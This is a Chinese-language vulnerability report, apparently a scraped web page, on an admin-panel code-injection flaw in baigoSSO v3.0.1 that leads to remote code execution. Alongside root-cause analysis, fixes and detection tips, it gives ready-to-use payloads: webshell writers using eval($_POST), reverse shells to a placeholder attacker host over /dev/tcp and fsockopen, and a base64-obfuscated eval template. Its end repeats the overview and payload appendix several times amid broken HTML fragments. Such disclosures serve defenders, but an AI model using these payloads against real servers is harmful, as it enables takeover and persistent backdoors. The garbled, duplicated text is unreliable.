某SSO开源单点登录系统后台代码执行漏洞分析报告<\/h1>

0x00 漏洞概述<\/h2>
受影响系统<\/strong>：baigoSSO v3.0.1
漏洞类型<\/strong>：后台代码注入导致远程代码执行
漏洞等级<\/strong>：高危
利用条件<\/strong>：需要后台管理员权限
影响范围<\/strong>：可导致服务器完全沦陷<\/p>

0x01 漏洞复现步骤<\/h2>
1. 环境准备<\/h3>

下载受影响版本：https:\/\/github.com\/baigoStudio\/baigoSSO<\/li>
安装并配置系统，获取后台管理员权限<\/li> <\/ul>
2. 漏洞利用过程<\/h3>

登录系统后台<\/li>
导航至：系统设置 → 基本设置 → 站点名称<\/li>
修改站点名称为以下payload：
aaaaa');phpinfo();\/*111111111 <\/code><\/pre> <\/li> 刷新页面，观察phpinfo()是否被执行<\/li> <\/ol> 0x02 漏洞原理分析<\/h2> 关键函数分析<\/h3> 漏洞位于mdl_const<\/code>函数中，该函数负责处理系统配置并生成配置文件：<\/p> function<\/span> mdl_const<\/span>($str_type) { <\/span><\/span> if<\/span> (!<\/span>fn_token<\/span>('chk'<\/span>)) { \/\/令牌验证 <\/span><\/span><\/span><\/span> return<\/span> array<\/span>('rcode'<\/span> =><\/span> 'x030206'<\/span>); <\/span><\/span> } <\/span><\/span> <\/span><\/span> $_str_content =<\/span> '<?php'<\/span> .<\/span> PHP_EOL<\/span>; <\/span><\/span> foreach<\/span> ($this-><\/span>arr_const<\/span>[$str_type] as<\/span> $_key=><\/span>$_value) { <\/span><\/span> if<\/span> (is_numeric<\/span>($_value)) { <\/span><\/span> $_str_content .=<\/span> 'define(\''<\/span> .<\/span> $_key .<\/span> '\', '<\/span> .<\/span> $_value .<\/span> ');'<\/span> .<\/span> PHP_EOL<\/span>; <\/span><\/span> } else<\/span> { <\/span><\/span> \/\/ 漏洞点：未对用户输入进行过滤直接拼接 <\/span><\/span><\/span><\/span> $_str_content .=<\/span> 'define(\''<\/span> .<\/span> $_key .<\/span> '\', \''<\/span> .<\/span> rtrim<\/span>(str_ireplace<\/span>(PHP_EOL<\/span>, '|'<\/span>, $_value), '\/\\'<\/span>) .<\/span> '\');'<\/span> .<\/span> PHP_EOL<\/span>; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/span><\/span> if<\/span> ($str_type ==<\/span> 'base'<\/span>) { <\/span><\/span> $_str_content .=<\/span> 'define(\'BG_SITE_SSIN\', \''<\/span> .<\/span> fn_rand<\/span>(6<\/span>) .<\/span> '\');'<\/span> .<\/span> PHP_EOL<\/span>; <\/span><\/span> } <\/span><\/span> <\/span><\/span> $_str_content =<\/span> str_ireplace<\/span>('||'<\/span>, ''<\/span>, $_str_content); <\/span><\/span> $_num_size =<\/span> $this-><\/span>obj_file<\/span>-><\/span>file_put<\/span>(BG_PATH_CONFIG<\/span> .<\/span> 'opt_'<\/span> .<\/span> $str_type .<\/span> '.inc.php'<\/span>, $_str_content); <\/span><\/span> \/\/ ...后续代码... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>文件写入过程<\/h3> 通过file_put<\/code>函数（封装了file_put_contents<\/code>）将配置写入文件：<\/p> function<\/span> file_put<\/span>($str_path, $str_content) { <\/span><\/span> $this-><\/span>dir_mk<\/span>($str_path); <\/span><\/span> $_num_size =<\/span> file_put_contents<\/span>($str_path, $str_content); <\/span><\/span> return<\/span> $_num_size; <\/span><\/span>} <\/span><\/span><\/code><\/pre>最终写入的文件路径为：BG_PATH_CONFIG\/opt_base.inc.php<\/code><\/p> 漏洞触发原理<\/h3> 用户输入被直接拼接到PHP配置文件中，未做任何过滤<\/li> 通过闭合单引号和PHP语句结束符，可以注入任意PHP代码<\/li> 配置文件被包含执行时，注入的代码会被执行<\/li> <\/ol> 0x03 漏洞利用扩展<\/h2> 1. 直接获取WebShell<\/h3> 使用以下payload可写入webshell：<\/p> ');file_put_contents('shell.php','<?php eval($_POST[cmd]);?>');\/* <\/code><\/pre> 2. 反弹Shell<\/h3> ');system('bash -c "bash -i >& \/dev\/tcp\/attacker_ip\/port 0>&1"');\/* <\/code><\/pre> 3. 隐蔽利用<\/h3> 使用base64编码：<\/p> ');eval(base64_decode('BASE64_PAYLOAD'));\/* <\/code><\/pre> 0x04 修复建议<\/h2> 临时缓解措施<\/h3> 限制后台访问IP<\/li> 修改配置文件权限为只读<\/li> <\/ol> 永久修复方案<\/h3> 对用户输入进行严格过滤：<\/li> <\/ol> function<\/span> safe_input<\/span>($value) { <\/span><\/span> $value =<\/span> str_replace<\/span>(array<\/span>("'"<\/span>, "<\/span>\"<\/span>"<\/span>, "<\/span>\\<\/span>"<\/span>, "<?"<\/span>, "?>"<\/span>), ""<\/span>, $value); <\/span><\/span> return<\/span> htmlspecialchars<\/span>($value, ENT_QUOTES<\/span>); <\/span><\/span>} <\/span><\/span><\/code><\/pre> 修改配置文件生成逻辑，使用序列化存储配置而非直接PHP代码<\/p> <\/li> 更新到最新版本（需确认官方是否已修复）<\/p> <\/li> <\/ol> 0x05 检测方法<\/h2> 检查opt_base.inc.php<\/code>文件中是否包含可疑代码<\/li> 监控配置文件修改行为<\/li> 使用Web应用防火墙规则检测配置修改请求中的可疑payload<\/li> <\/ol> 0x06 参考链接<\/h2> 官方GitHub仓库：https:\/\/github.com\/baigoStudio\/baigoSSO<\/li> 漏洞披露时间：2019-03-21<\/li> <\/ul> 附录：完整攻击Payload示例<\/h2> ');$sock=fsockopen("attacker_ip",port);exec("\/bin\/sh -i <&3 >&3 2>&3");\/* <\/code><\/pre> ');file_put_contents($_SERVER['DOCUMENT_ROOT'].'\/shell.php','<?php @eval($_POST[pass]);?>');\/* <\/code><\/pre>

某SSO开源单点登录系统后台代码执行漏洞分析报告<\/h1>

0x00 漏洞概述<\/h2> 受影响系统<\/strong>：baigoSSO v3.0.1 漏洞类型<\/strong>：后台代码注入导致远程代码执行 漏洞等级<\/strong>：高危 利用条件<\/strong>：需要后台管理员权限 影响范围<\/strong>：可导致服务器完全沦陷<\/p>

0x02 漏洞原理分析<\/h2>

0x03 漏洞利用扩展<\/h2>

0x04 修复建议<\/h2>

附录：完整攻击Payload示例<\/h2> ');$sock=fsockopen("attacker_ip",port);exec("\/bin\/sh -i <&3 >&3 2>&3");\/* <\/code><\/pre> ');file_put_contents($_SERVER['DOCUMENT_ROOT'].'\/shell.php','<?php @eval($_POST[pass]);?>');\/* <\/code><\/pre>

0x00 漏洞概述<\/h2>
受影响系统<\/strong>：baigoSSO v3.0.1
漏洞类型<\/strong>：后台代码注入导致远程代码执行
漏洞等级<\/strong>：高危
利用条件<\/strong>：需要后台管理员权限
影响范围<\/strong>：可导致服务器完全沦陷<\/p>

附录：完整攻击Payload示例<\/h2>
`');$sock=fsockopen("attacker_ip",port);exec("\/bin\/sh -i <&3 >&3 2>&3");\/* <\/code><\/pre> ');file_put_contents($_SERVER['DOCUMENT_ROOT'].'\/shell.php','<?php @eval($_POST[pass]);?>');\/* <\/code><\/pre>`